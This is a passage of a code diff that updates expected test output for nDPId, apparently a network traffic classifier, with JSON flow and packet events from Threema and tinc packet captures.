+00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1655301676988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655301676988,"pkt":"eJS0JASgYDjgxTWgCABFAAA0OhxAAD8GmNTAqAJkuVjsbsVEFGa+1hz2PrdC4oAQAVdp2AAAAQEICgAPJvUNuzbq"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":40,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655301676958,"flow_last_seen":1655301678700,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":681,"flow_avg_l4_payload_len":68,"midstream":0,"thread_ts_msec":1655301678700,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50500,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":43,"source":"threema.pcap","alias":"nDPId-test","packets-captured":43,"packets-processed":42,"total-skipped-flows":0,"total-l4-payload-len":4306,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":3,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18,"global_ts_msec":1655304039977} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":43,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655304039977,"flow_last_seen":1655304039977,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655304039977,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50618,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1655304039977,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655304039977,"pkt":"eJS0JASgYDjgxTWgCABFAAA8D\/ZAAD8GwvLAqAJkuVjsbsW6FGZ91skoAAAAAKAC\/\/\/3HAAAAgQFtAQCCAoAEMbeAAAAAAEDAwg="} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1655304040001,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655304040001,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxbp03BGqfdbJKaAS\/\/+2UQAAAgQFrAEDAwYEAggKO2t+0gAQxt4="} 
+00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1655304040004,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655304040004,"pkt":"eJS0JASgYDjgxTWgCABFAAA0D\/dAAD8GwvnAqAJkuVjsbsW6FGZ91skpdNwRq4AQAVfjtgAAAQEICgAQxuU7a37S"} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1655304039977,"flow_last_seen":1655304040312,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1655304040312,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50618,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1655301676958,"flow_last_seen":1655301738438,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":681,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1655304045367,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50500,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} 
+00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","packets-captured":58,"packets-processed":57,"total-skipped-flows":0,"total-l4-payload-len":5258,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":4,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":25,"global_ts_msec":1655306704436} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655306704436,"flow_last_seen":1655306704436,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655306704436,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50718,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1655306704436,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655306704436,"pkt":"eJS0JASgYDjgxTWgCABFAAA8W4NAAD8Gd2XAqAJkuVjsbsYeFGbGZSToAAAAAKAC\/\/+Z2wAAAgQFtAQCCAoAEn9rAAAAAAEDAwg="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1655306704460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655306704460,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxh4tYXzzxmUk6aAS\/\/9+tQAAAgQFrAEDAwYEAggKd2P5ZgASf2s="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1655306704463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655306704463,"pkt":"eJS0JASgYDjgxTWgCABFAAA0W4RAAD8Gd2zAqAJkuVjsbsYeFGbGZSTpLWF89IAQAVesGwAAAQEICgASf3F3Y\/lm"} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":67,"source":"threema.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655304039977,"flow_last_seen":1655304045367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":595,"flow_tot_l4_payload_len":952,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1655306704559,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50618,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} 
+00554{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":71,"source":"threema.pcap","alias":"nDPId-test","packets-captured":71,"packets-processed":70,"total-skipped-flows":0,"total-l4-payload-len":5631,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":3,"total-active-flows":5,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":31,"global_ts_msec":1655307958972} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655307958972,"flow_last_seen":1655307958972,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655307958972,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50860,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1655307958972,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655307958972,"pkt":"eJS0JASgYDjgxTWgCABFAAA80XZAAD8GAXLAqAJkuVjsbsasFGYhOI\/mAAAAAKAC\/\/\/0UwAAAgQFtAQCCAoAFl6QAAAAAAEDAwg="} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1655307958996,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655307958996,"pkt":"YDjgxTWgeJS0JASgCABFAAA8AABAADgG2ei5WOxuwKgCZBRmxqxr+FC1ITiP56AS\/\/\/D1gAAAgQFrAEDAwYEAggK\/JV3MgAWXpA="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1655307958999,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655307958999,"pkt":"eJS0JASgYDjgxTWgCABFAAA00XdAAD8GAXnAqAJkuVjsbsasFGYhOI\/na\/hQtoAQAVfxOwAAAQEICgAWXpf8lXcy"} +00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":80,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655306704436,"flow_last_seen":1655306777863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655307959100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50718,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} 
+00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":80,"source":"threema.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655306704436,"flow_last_seen":1655306777863,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655307959100,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50718,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655301424082,"flow_last_seen":1655301470813,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":444,"flow_tot_l4_payload_len":1567,"flow_avg_l4_payload_len":104,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50298,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1655301591783,"flow_last_seen":1655301622013,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":735,"flow_tot_l4_payload_len":2058,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50484,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} 
+00651{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655307958972,"flow_last_seen":1655308018973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50860,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Threema","breed":"Acceptable","category":"Chat"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1655307958972,"flow_last_seen":1655308018973,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":373,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1655308018973,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"185.88.236.110","src_port":50860,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00556{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":83,"source":"threema.pcap","alias":"nDPId-test","packets-captured":83,"packets-processed":83,"total-skipped-flows":0,"total-l4-payload-len":6004,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":4,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":6,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":42,"global_ts_msec":1655308018973} +~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ +~~ packets captured/processed: 83/83 +~~ skipped flows.............: 0 +~~ total layer4 data length..: 6004 bytes +~~ total detected 
protocols..: 4 +~~ total active/idle flows...: 6/6 +~~ total timeout flows.......: 0 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ total memory allocated....: 6023072 bytes +~~ total memory freed........: 6023072 bytes +~~ total allocations/frees...: 120985/120985 +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +~~ json string min len.......: 463 chars +~~ json string max len.......: 690 chars +~~ json string avg len.......: 575 chars diff --git a/test/results/tinc.pcap.out b/test/results/tinc.pcap.out index 5188de152..a5d19a213 100644 --- a/test/results/tinc.pcap.out +++ b/test/results/tinc.pcap.out 
@@ -8,22 +8,22 @@ 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1495983427768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427768,"pkt":"ABcILL3nACbGCvpSCABFEAAovExAAEAGvyGDcqgbuVPacOds2We5l\/9BoNDrQlAQAOXp2wAA"} 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1495983427794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1495983427794,"pkt":"ACbGCvpSABcILL3nCABFCAA0AABAADEGimq5U9pwg3KoG9lowIoRT99iFi\/Q\/IASOQgE1gAAAgQFtAEBBAIBAwMH"} 00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1495983427794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1495983427794,"pkt":"ABcILL3nACbGCvpSCABFEAAok+pAAEAG54ODcqgbuVPacMCK2WgWL9D8EU\/fY1AQAOV9ywAA"} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on 
Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} -00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"tinc.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1495983427717,"flow_last_seen":1495983427818,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2097,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1495983427818,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":59244,"dst_port":55655,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 
+00774{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"tinc.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1495983427744,"flow_last_seen":1495983427846,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1039,"flow_tot_l4_payload_len":2090,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1495983427846,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":49290,"dst_port":55656,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":200000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01302{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1495983428000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":686,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":686,"pkt_l4_len":652,"thread_ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAAKgAABAAEARePuDcqgbuVPacNln2WcCjOIVMnicz9ZajjNEbdb6GxVP+T0CYtKzdvwcc\/GkysPu2p+HyRNKFCh5wNXMj6m9vaZ39wOg\/SFDxkblUqiUmI5T0t6KnEjzK4HfVELTk6MBki+YvI91VjjOz3oekNHxmSbldeRnnKPd925mZ9lxMA3GG9gZmsCSn4wPwr41LS70gLZbanbUNnlN7x6Kh9gVM6JtlzGBIjbSf6B4epOKePy2xW4AQp4bPXtTf\/0OGkPuy5hSETaSFX43lK3JOI2urGuq\/8zhvAyKL4t3LDJwEcTmglCiHm1tbrVnkmBCUBidOZ0NL52X+MKzyHnGOwdAwfV4+3VKFFmQE8IO6WWoZ\/vYOzfj1XZjyXREui0IMCYkWnraOSjlBBxRPQ4DkdgtsHokBlbzUjfr8Ss8XpNaUoZaaRCYy8Kw3szJstqYEU2GPLD0+pg+X9RZcEt+NlU1dFprcf5TwwLwxVrUXlq0UN21vjPNjBpnc4JeghgRv\/VcYRefFyhIUgPMVrdpg5GrCB4JTq65maVpsTyfybYsJ+i42aA3YjBU5z0PIhvBUxoHrj9TxX5OiZvAe42wvflGvW6iHzGGkgjUXDRxjS28FvW05QZJMaG4nQLQu0v8AHNHzQKZciwh33gMV3VVc\/5ghMO+CpJHRRkAZ7mBJzHMFXodcVJsk6K\/2J54sUaiJ48wBzCUQaWI9+w9ancXV2nZd+EHodY95wdzarfbqW8B30M66dRT3RsX8ddjytNxLuW+ewDpuzxP\/dncf+l0Gbul3BZMq9q4XnRT0wDb7bXlR0N7oHMRyWJ2GHC0RV7IQnYGzB\/YDI0StaWXOcSFic4ZA5TwYmSAm0iGFMYJM8DJznOohvp1QzM="} -00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":200000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": 
{"total":260,"client":230,"server":30}}},"confidence": {"3":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":42,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1495983428000,"flow_last_seen":1495983428000,"flow_idle_time":200000,"flow_min_l4_payload_len":644,"flow_max_l4_payload_len":644,"flow_tot_l4_payload_len":644,"flow_avg_l4_payload_len":644,"midstream":0,"thread_ts_msec":1495983428000,"l3_proto":"ip4","src_ip":"131.114.168.27","dst_ip":"185.83.218.112","src_port":55655,"dst_port":55655,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"5":"DPI (cache)"},"proto":"TINC","breed":"Acceptable","category":"VPN"}} 01364{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"tinc.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1495983428000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":734,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":734,"pkt_l4_len":700,"thread_ts_msec":1495983428000,"pkt":"ABcILL3nACbGCvpSCABFAALQAABAAEAReMuDcqgbuVPacNln2WcCvOcuvywVtuwFGBCYss6acsiJNNNiAbBIlKDNCK44gk8rPgtBTYPcB0TBQaeKKWA+4iZhbEKh+1udHAv6t2B1Yn6IJMtYq5DM3X4M272sdmCIguJEDbWnC1eertoAJ\/nCld7bT5YQq8t1ppSFEJgecf3feprazQpcAFso0UkuKa+f8uN2aRv39oQ84yMBNBDhwVJ0a0nVOlZ6yZDSD51mMG4JoLiN6RWJXjcVqxy8m9jXpG1c+xsS0O6vC2KUMrKi+v7l2G+JsqarL4sHxppbbBoKMn1G6jriIHVF2byGLSZ00B3htFsVVj1wv1QBh8gghmipFPjUm\/aeSaE+oJUPKU+sp7Dg6Xva6c8vbo3TtJqvjKV8ke6QyQ7aGh5wPiN9\/a7xgRazNtYiEGk2\/mB4tPUVqvmOMmFqyRUy5E54tmImaZBxLH6d0RcjOcdr5cOGQQBnbEVGuWb70eAFXbxU9GwFaLQbsB4ixO+0UXLmZZZSFjcwzL0p2ByLphsBC+0r5HUR+xSSVPlg1gpXDvLAqvPafPWGz0oEsVqgZuuOxAECfRwfFUitnotekdgFMlckueO6aNw3gcrUrWq8lluC226td1YzzuWc1bztMEO46Nwl29tlwW+n4BfE8Ks4iF0RmPeruypgNV
